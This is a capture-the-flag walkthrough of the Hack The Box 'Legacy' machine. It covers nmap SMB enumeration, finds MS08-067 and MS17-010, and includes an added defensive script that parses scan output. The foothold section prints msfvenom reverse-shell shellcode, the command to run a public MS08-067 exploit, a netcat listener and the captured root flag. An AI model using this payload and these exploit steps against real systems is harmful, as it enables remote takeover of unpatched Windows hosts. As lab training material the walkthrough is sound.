Monday, November 1, 2021

HTB - Legacy

Introduction

IP: 10.10.10.4

OS: Windows


Today we will break an easy Windows machine called Legacy.

You will learn basic exploitation of known SMB vulnerabilities.


Enumeration phase

nmap -p- --open -T5 -sCV -v -Pn -n 10.10.10.4 -oN legacy.nmap

We scan all 65535 TCP ports and report only the open ones (-p- --open), use the aggressive -T5 timing template to go faster, run the default enumeration scripts with version detection (-sCV), and skip host discovery and DNS resolution (-Pn -n). Let's see what we get:

Host script results:
|_clock-skew: mean: 5d01h03m49s, deviation: 1h24m51s, median: 5d00h03m48s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:b8:6d (VMware)
| Names:
|   LEGACY<00>           Flags: <unique><active>
|   HTB<00>              Flags: <group><active>
|   LEGACY<20>           Flags: <unique><active>
|   HTB<1e>              Flags: <group><active>
|   HTB<1d>              Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2021-11-05T20:26:00+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)


From the nmap output we observe some interesting things.

First, the OS is very old (Windows XP), and the target exposes the SMB service (ports 139 and 445) with message signing disabled and no SMB2 support, so known SMB vulnerabilities are the natural place to look.


SMB known vulnerabilities

Nmap ships NSE scripts (smb-vuln-*) that check whether the SMB service is affected by known vulnerabilities:

# nmap --script smb-vuln* -p 139,445 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-31 17:27 CET
Nmap scan report for 10.10.10.4
Host is up (0.11s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|         
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
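When you scan more than one host, reading the smb-vuln-* output by eye does not scale. The script below is an added example written for this writeup (it is not part of the original post and not an nmap tool): it parses nmap's normal text output (-oN), groups the host script lines by NSE script name, lists every smb-vuln-* script whose State is VULNERABLE together with the CVE ids it mentions, and flags the configuration facts a defender cares about even when no vulnerability script fires (an end-of-life OS, SMB signing disabled, SMB2 negotiation failing). The sample report embedded in it is a constructed, trimmed copy of the scan output shown above.

```python
"""Triage nmap SMB host-script output: VULNERABLE findings plus risky settings.

Added example for this writeup, not the original post's code and not an nmap
utility. It works on nmap's normal (-oN) text output.
"""
import re

# Constructed sample: a trimmed copy of the host script output shown in the writeup.
SAMPLE_REPORT = """\
Nmap scan report for 10.10.10.4
Host script results:
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|_  System time: 2021-11-05T20:26:00+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
"""

NAME_RE = re.compile(r"[a-z][a-z0-9-]*")   # NSE script names are lowercase with dashes
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")
EOL_OS = ("Windows 2000", "Windows XP", "Windows Server 2003")  # out of support


def split_scripts(report: str) -> dict:
    """Group the '|'-prefixed host script lines by NSE script name.

    A script header sits at most one space after the '|' (or directly after
    '|_'); nested output lines are indented by two or more spaces.
    """
    scripts, current = {}, None
    for line in report.splitlines():
        if not line.startswith("|"):
            current = None                      # left the host script block
            continue
        rest = line[1:]
        if rest.startswith("_"):                # '|_' marks the last line of a script
            rest = rest[1:]
        indent = len(rest) - len(rest.lstrip(" "))
        text = rest.strip()
        name, _, remainder = text.partition(":")
        if indent <= 1 and NAME_RE.fullmatch(name):
            current = name
            scripts[current] = [remainder.strip()] if remainder.strip() else []
        elif current is not None:
            scripts[current].append(text)
    return scripts


def vulnerable_findings(scripts: dict) -> list:
    """Return (script, sorted CVE ids) for each smb-vuln-* script reporting VULNERABLE."""
    findings = []
    for name, lines in scripts.items():
        if not name.startswith("smb-vuln-"):
            continue
        if not any(l.startswith("State:") and "VULNERABLE" in l for l in lines):
            continue                            # 'false' or an ERROR: line, not a finding
        cves = sorted({cve for l in lines for cve in CVE_RE.findall(l)})
        findings.append((name, cves))
    return findings


def risk_flags(scripts: dict) -> list:
    """Configuration facts worth raising even if no vulnerability script matched."""
    flags = []
    for l in scripts.get("smb-os-discovery", []):
        if l.startswith("OS:") and any(os_name in l for os_name in EOL_OS):
            flags.append("end-of-life OS: " + l[3:].strip())
    for l in scripts.get("smb-security-mode", []):
        if l.startswith("message_signing:") and "disabled" in l:
            flags.append("SMB signing disabled")
    if any("negotiation failed" in l for l in scripts.get("smb2-time", [])):
        flags.append("SMB2 negotiation failed (likely SMBv1 only)")
    return flags


def triage(report: str) -> dict:
    """Full pass over one report: vulnerable findings plus risk flags."""
    scripts = split_scripts(report)
    return {"vulnerable": vulnerable_findings(scripts), "flags": risk_flags(scripts)}


if __name__ == "__main__":
    result = triage(SAMPLE_REPORT)
    for name, cves in result["vulnerable"]:
        print(f"[VULN] {name}: {', '.join(cves) or 'no CVE id listed'}")
    for flag in result["flags"]:
        print(f"[FLAG] {flag}")
```

Run it against a saved scan with `triage(open("legacy.nmap").read())`; the `State:` check matters because nmap also emits `false` and `ERROR:` results under the same smb-vuln-* prefix, and only an explicit VULNERABLE state should become a finding.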


Foothold

nmap detects two vulnerabilities: MS17-010, which is EternalBlue, and also MS08-067.

MS08-067 (https://support.microsoft.com/en-us/topic/ms08-067-vulnerability-in-server-service-could-allow-remote-code-execution-ac7878fc-be69-7143-472d-2507a179cd15) allows remote code execution.

Looking into MS08-067 we find this page:

https://github.com/andyacer/ms08_067

It is a Python script that exploits the vulnerability and gives remote command execution, so we can create the following payload in order to get a reverse shell.

Let's create the payload with msfvenom (-b lists the bad characters the exploit cannot carry, so the encoder avoids them; -f py emits the result as a Python byte string):

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.18 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows


shellcode =  b""
shellcode += b"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0"
shellcode += b"\x5e\x81\x76\x0e\x39\x8e\x35\xb3\x83\xee\xfc"
shellcode += b"\xe2\xf4\xc5\x66\xb7\xb3\x39\x8e\x55\x3a\xdc"
shellcode += b"\xbf\xf5\xd7\xb2\xde\x05\x38\x6b\x82\xbe\xe1"
shellcode += b"\x2d\x05\x47\x9b\x36\x39\x7f\x95\x08\x71\x99"
shellcode += b"\x8f\x58\xf2\x37\x9f\x19\x4f\xfa\xbe\x38\x49"
shellcode += b"\xd7\x41\x6b\xd9\xbe\xe1\x29\x05\x7f\x8f\xb2"
shellcode += b"\xc2\x24\xcb\xda\xc6\x34\x62\x68\x05\x6c\x93"
shellcode += b"\x38\x5d\xbe\xfa\x21\x6d\x0f\xfa\xb2\xba\xbe"
shellcode += b"\xb2\xef\xbf\xca\x1f\xf8\x41\x38\xb2\xfe\xb6"
shellcode += b"\xd5\xc6\xcf\x8d\x48\x4b\x02\xf3\x11\xc6\xdd"
shellcode += b"\xd6\xbe\xeb\x1d\x8f\xe6\xd5\xb2\x82\x7e\x38"
shellcode += b"\x61\x92\x34\x60\xb2\x8a\xbe\xb2\xe9\x07\x71"
shellcode += b"\x97\x1d\xd5\x6e\xd2\x60\xd4\x64\x4c\xd9\xd1"
shellcode += b"\x6a\xe9\xb2\x9c\xde\x3e\x64\xe6\x06\x81\x39"
shellcode += b"\x8e\x5d\xc4\x4a\xbc\x6a\xe7\x51\xc2\x42\x95"
shellcode += b"\x3e\x71\xe0\x0b\xa9\x8f\x35\xb3\x10\x4a\x61"
shellcode += b"\xe3\x51\xa7\xb5\xd8\x39\x71\xe0\xe3\x69\xde"
shellcode += b"\x65\xf3\x69\xce\x65\xdb\xd3\x81\xea\x53\xc6"
shellcode += b"\x5b\xa2\xd9\x3c\xe6\x3f\xb9\x37\x9c\x5d\xb1"
shellcode += b"\x39\x8f\x8e\x3a\xdf\xe4\x25\xe5\x6e\xe6\xac"
shellcode += b"\x16\x4d\xef\xca\x66\xbc\x4e\x41\xbf\xc6\xc0"
shellcode += b"\x3d\xc6\xd5\xe6\xc5\x06\x9b\xd8\xca\x66\x51"
shellcode += b"\xed\x58\xd7\x39\x07\xd6\xe4\x6e\xd9\x04\x45"
shellcode += b"\x53\x9c\x6c\xe5\xdb\x73\x53\x74\x7d\xaa\x09"
shellcode += b"\xb2\x38\x03\x71\x97\x29\x48\x35\xf7\x6d\xde"
shellcode += b"\x63\xe5\x6f\xc8\x63\xfd\x6f\xd8\x66\xe5\x51"
shellcode += b"\xf7\xf9\x8c\xbf\x71\xe0\x3a\xd9\xc0\x63\xf5"
shellcode += b"\xc6\xbe\x5d\xbb\xbe\x93\x55\x4c\xec\x35\xd5"
shellcode += b"\xae\x13\x84\x5d\x15\xac\x33\xa8\x4c\xec\xb2"
shellcode += b"\x33\xcf\x33\x0e\xce\x53\x4c\x8b\x8e\xf4\x2a"
shellcode += b"\xfc\x5a\xd9\x39\xdd\xca\x66"


Now we edit the ms08-067.py script, replace its shellcode with the one we just generated, and run it against the target (arguments: target IP, the script's target-profile number and the SMB port):

# /usr/bin/python2.7 ms08-067.py 10.10.10.4 6 445

Before running it we need a listener waiting on port 443, the port the payload connects back to:

# nc -nlvp 443

C:\Documents and Settings\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\Administrator\Desktop

16/03/2017  08:18    <DIR>          .
16/03/2017  08:18    <DIR>          ..
16/03/2017  08:18                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.400.897.024 bytes free

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
993442d258b0e0ec917cae9e695d5713
